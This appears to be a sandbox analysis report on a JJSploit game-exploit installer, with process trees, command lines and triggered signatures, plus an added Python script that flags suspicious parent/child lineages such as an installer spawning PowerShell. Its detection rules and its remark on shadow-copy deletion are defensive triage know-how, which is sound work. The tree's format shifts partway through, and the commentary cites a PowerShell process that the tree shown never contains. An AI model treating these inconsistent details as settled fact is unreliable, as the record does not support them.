- 1044 MicrosoftEdgeUpdate.exe -> 2712 MicrosoftEdgeUpdate.exe (3)
- 1044 MicrosoftEdgeUpdate.exe -> 3696 MicrosoftEdgeUpdate.exe (3)
- 1440 MicrosoftEdgeUpdate.exe -> 4380 MicrosoftEdgeUpdate.exe (3)
- 1440 MicrosoftEdgeUpdate.exe -> 4332 MicrosoftEdge_X64_130.0.2849.52.exe (2)
- 4332 MicrosoftEdge_X64_130.0.2849.52.exe -> 4788 setup.exe (2)
- 4788 setup.exe -> 2736 setup.exe (2)
- 1440 MicrosoftEdgeUpdate.exe -> 3220 MicrosoftEdgeUpdate.exe (3)
- 1384 MsiExec.exe -> 3724 JJSploit.exe (2)
- 3724 JJSploit.exe -> 1164 cmd.exe (2)
- 3724 JJSploit.exe -> 2592 cmd.exe (2)
- 3724 JJSploit.exe -> 3604 msedgewebview2.exe (2)
- 3604 msedgewebview2.exe -> 1600 msedgewebview2.exe (2)
- 2592 cmd.exe -> 3148 msedge.exe (2)
- 1164 cmd.exe -> 5044 msedge.exe (2)
- 3148 msedge.exe -> 3768 msedge.exe (2)
- 5044 msedge.exe -> 3960 msedge.exe (2)
- 3604 msedgewebview2.exe -> 3244 msedgewebview2.exe (3)

PID 1440 MicrosoftEdgeUpdate.exe has no parent recorded in this list; it is the separate updater instance that fetches and runs the MicrosoftEdge_X64_130.0.2849.52.exe installer. The chain that matters for the verdict is the first one: the Windows Installer service (1292) runs powershell.exe (3780) as a custom action, which is the process the "Blocklisted process makes network request" and "Downloads MZ/PE file" signatures refer to, and that PowerShell then launches the WebView2 bootstrapper.
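The parent/child records above, and the Processes tree that follows, are what an analyst actually reasons over when deciding whether an installer did something it should not. The script below is an added example written for this page, not part of the sandbox report: it parses records in the sandbox's own "PID X wrote to memory of Y" format, collapses the repeated edges, rebuilds each process's ancestry, and flags the lineages that matter here (installer to PowerShell, PowerShell to a further executable, and cmd.exe to a browser). The sample input is a subset copied from the list above; the rule names and the wildcard matching are this example's own conventions.

```python
import re

# Parent/child records in the sandbox's "wrote to memory of" format, copied
# from the WriteProcessMemory list above (a representative subset; the first
# edge is repeated on purpose to show that parse_edges() collapses duplicates).
SAMPLE = """\
PID 1292 wrote to memory of 1384 1292 msiexec.exe MsiExec.exe
PID 1292 wrote to memory of 1384 1292 msiexec.exe MsiExec.exe
PID 1292 wrote to memory of 1932 1292 msiexec.exe srtasks.exe
PID 1292 wrote to memory of 3780 1292 msiexec.exe powershell.exe
PID 3780 wrote to memory of 768 3780 powershell.exe MicrosoftEdgeWebview2Setup.exe
PID 768 wrote to memory of 1044 768 MicrosoftEdgeWebview2Setup.exe MicrosoftEdgeUpdate.exe
PID 1044 wrote to memory of 4428 1044 MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdate.exe
PID 4428 wrote to memory of 440 4428 MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdateComRegisterShell64.exe
PID 1384 wrote to memory of 3724 1384 MsiExec.exe JJSploit.exe
PID 3724 wrote to memory of 1164 3724 JJSploit.exe cmd.exe
PID 3724 wrote to memory of 2592 3724 JJSploit.exe cmd.exe
PID 3724 wrote to memory of 3604 3724 JJSploit.exe msedgewebview2.exe
PID 1164 wrote to memory of 5044 1164 cmd.exe msedge.exe
PID 2592 wrote to memory of 3148 2592 cmd.exe msedge.exe
"""

# "PID <ppid> wrote to memory of <pid> <ppid> <parent image> <child image>";
# the back-reference insists the parent PID is repeated, as the sandbox does.
RECORD = re.compile(
    r"PID (?P<ppid>\d+) wrote to memory of (?P<pid>\d+) (?P=ppid) (?P<parent>\S+) (?P<child>\S+)"
)

# Lineage patterns to flag, matched against the tail of a process's ancestry
# (image names compared case-insensitively; "*" matches any single process).
RULES = {
    # Windows Installer custom action running PowerShell; in this report that
    # PowerShell is the process that downloads an MZ/PE file.
    "installer_spawns_powershell": ("msiexec.exe", "powershell.exe"),
    # PowerShell launching any further executable (here the WebView2 bootstrapper).
    "powershell_spawns_executable": ("powershell.exe", "*"),
    # A dropped application opening the browser via "cmd /C start <url>".
    "cmd_launches_browser": ("cmd.exe", "msedge.exe"),
}


def parse_edges(text):
    """Return {child_pid: (child_image, parent_pid, parent_image)}."""
    edges = {}
    for line in text.splitlines():
        m = RECORD.match(line.strip())
        if m:
            edges[int(m["pid"])] = (m["child"], int(m["ppid"]), m["parent"])
    return edges


def lineage(edges, pid):
    """Ancestry of `pid`, outermost recorded ancestor first, as [(pid, image), ...]."""
    chain, seen = [], set()
    while pid in edges and pid not in seen:
        seen.add(pid)                      # guard against PID reuse loops
        name, ppid, pname = edges[pid]
        chain.append((pid, name))
        if ppid not in edges:              # root: its own parent was never logged
            chain.append((ppid, pname))
        pid = ppid
    return chain[::-1]


def detect(edges):
    """One hit per (rule, process) whose ancestry ends with the rule's pattern."""
    hits = []
    for pid in sorted(edges):
        chain = lineage(edges, pid)
        names = [n.lower() for _, n in chain]
        for rule, pattern in RULES.items():
            tail = names[-len(pattern):]
            if len(tail) == len(pattern) and all(p == "*" or p == n for p, n in zip(pattern, tail)):
                hits.append((rule, pid, " -> ".join(f"{n}[{p}]" for p, n in chain)))
    return hits


if __name__ == "__main__":
    for rule, pid, chain in detect(parse_edges(SAMPLE)):
        print(f"{rule:30} {chain}")
```

Matching on the tail of the ancestry rather than anywhere in it means each rule fires once, on the process that completes the pattern, instead of once for every descendant of that process; on the sample it reports PowerShell (3780) under msiexec.exe, the WebView2 bootstrapper (768) under PowerShell, and the two browser launches (5044, 3148) under cmd.exe.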
System policy modification 1 TTPs 1 IoCs
Processes: msedgewebview2.exe
Entries (description, ioc, process):
- Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection msedgewebview2.exe
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots. In this trace the behaviour is consistent with ordinary Windows Installer housekeeping: the installer service process msiexec.exe (PID 1292) spawns srtasks.exe (PID 1932), the System Restore task host, which creates a restore point before the install. Within the process records shown here nothing deletes shadow copies (no vssadmin.exe or wmic shadowcopy invocation), which is the pattern that would make this signature ransomware-relevant.
Processes
(each entry: image path, command line, triggered signatures, PID; the bracketed number and the indentation give the depth in the parent/child tree)

[1] C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\JJSploit_8.10.8_x64_en-US.msi
    - Enumerates connected drives
    - Event Triggered Execution: Installer Packages
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:4604

[1] C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    - Enumerates connected drives
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1292

  [2] C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 94B7DBA97900214B47D5F97A945AA60C C
      - Loads dropped DLL
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID:1384

    [3] C:\Program Files\JJSploit\JJSploit.exe
        "C:\Program Files\JJSploit\JJSploit.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Checks whether UAC is enabled
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of WriteProcessMemory
        PID:3724

      [4] C:\Windows\system32\cmd.exe
          "cmd" /C start https://www.youtube.com/@Omnidev_
          - Suspicious use of WriteProcessMemory
          PID:1164

        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/@Omnidev_
            - Enumerates system info in registry
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            - Suspicious use of FindShellTrayWindow
            - Suspicious use of SendNotifyMessage
            - Suspicious use of WriteProcessMemory
            PID:5044

          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffbc45046f8,0x7ffbc4504708,0x7ffbc4504718
              PID:3960

          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
              PID:672

          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
              - Suspicious behavior: EnumeratesProcesses
              PID:2276

          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:8
              PID:3324

          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
              PID:3044

          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
              PID:4200

          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3984 /prefetch:1
              PID:5132

          [6] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5356 /prefetch:8
              PID:5836

          [6] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5356 /prefetch:8
              - Suspicious behavior: EnumeratesProcesses
              PID:6008

          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
              PID:6124

          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:1
              PID:6132

          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:1
              PID:2172

          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
              PID:1256

          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3672 /prefetch:1
              PID:1632

          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:1
              PID:1392

          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,14759081010104322742,11451029881465339224,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5004 /prefetch:2
              - Suspicious behavior: EnumeratesProcesses
              PID:4360

      [4] C:\Windows\system32\cmd.exe
          "cmd" /C start https://www.youtube.com/@WeAreDevsExploits
          - Suspicious use of WriteProcessMemory
          PID:2592

        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/@WeAreDevsExploits
            - Suspicious use of WriteProcessMemory
            PID:3148

          [6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffbc45046f8,0x7ffbc4504708,0x7ffbc4504718
              PID:3768
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,10340906066649243167,10254102589260337003,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:26⤵PID:4592
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,10340906066649243167,10254102589260337003,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2412 /prefetch:36⤵
- Suspicious behavior: EnumeratesProcesses
PID:3776 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.8 --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --noerrdialogs --embedded-browser-webview-dpi-awareness=2 --disable-features=msWebOOUI,msPdfOOUI,msSmartScreenProtection --lang=en-US --mojo-named-platform-channel-pipe=3724.4528.24361783564329320354⤵
- Checks computer location settings
- Checks system information in the registry
- Drops file in Program Files directory
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3604 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=130.0.6723.59 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=130.0.2849.52 --initial-client-data=0x15c,0x160,0x164,0x138,0x174,0x7ffbc40e4dc0,0x7ffbc40e4dcc,0x7ffbc40e4dd85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1600 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=gpu-process --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.8 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1772,i,1390419007366082302,17303229957542763952,262144 --disable-features=msPdfOOUI,msSmartScreenProtection,msWebOOUI --variations-seed-version --mojo-platform-channel-handle=1764 /prefetch:25⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3244 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.8 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=1988,i,1390419007366082302,17303229957542763952,262144 --disable-features=msPdfOOUI,msSmartScreenProtection,msWebOOUI --variations-seed-version --mojo-platform-channel-handle=2016 /prefetch:35⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4872 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.8 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=2312,i,1390419007366082302,17303229957542763952,262144 --disable-features=msPdfOOUI,msSmartScreenProtection,msWebOOUI --variations-seed-version --mojo-platform-channel-handle=2328 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3140 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=renderer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.8 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --field-trial-handle=3348,i,1390419007366082302,17303229957542763952,262144 --disable-features=msPdfOOUI,msSmartScreenProtection,msWebOOUI --variations-seed-version --mojo-platform-channel-handle=3368 /prefetch:15⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:4808 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.8 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=2080,i,1390419007366082302,17303229957542763952,262144 --disable-features=msPdfOOUI,msSmartScreenProtection,msWebOOUI --variations-seed-version --mojo-platform-channel-handle=4760 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1860 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.8 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=4784,i,1390419007366082302,17303229957542763952,262144 --disable-features=msPdfOOUI,msSmartScreenProtection,msWebOOUI --variations-seed-version --mojo-platform-channel-handle=4888 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5564 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.8 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=4900,i,1390419007366082302,17303229957542763952,262144 --disable-features=msPdfOOUI,msSmartScreenProtection,msWebOOUI --variations-seed-version --mojo-platform-channel-handle=5008 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4488 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.8 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=5004,i,1390419007366082302,17303229957542763952,262144 --disable-features=msPdfOOUI,msSmartScreenProtection,msWebOOUI --variations-seed-version --mojo-platform-channel-handle=5116 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5628 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.8 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=5096,i,1390419007366082302,17303229957542763952,262144 --disable-features=msPdfOOUI,msSmartScreenProtection,msWebOOUI --variations-seed-version --mojo-platform-channel-handle=5092 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3616 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.8 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=4964,i,1390419007366082302,17303229957542763952,262144 --disable-features=msPdfOOUI,msSmartScreenProtection,msWebOOUI --variations-seed-version --mojo-platform-channel-handle=5116 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:5440 -
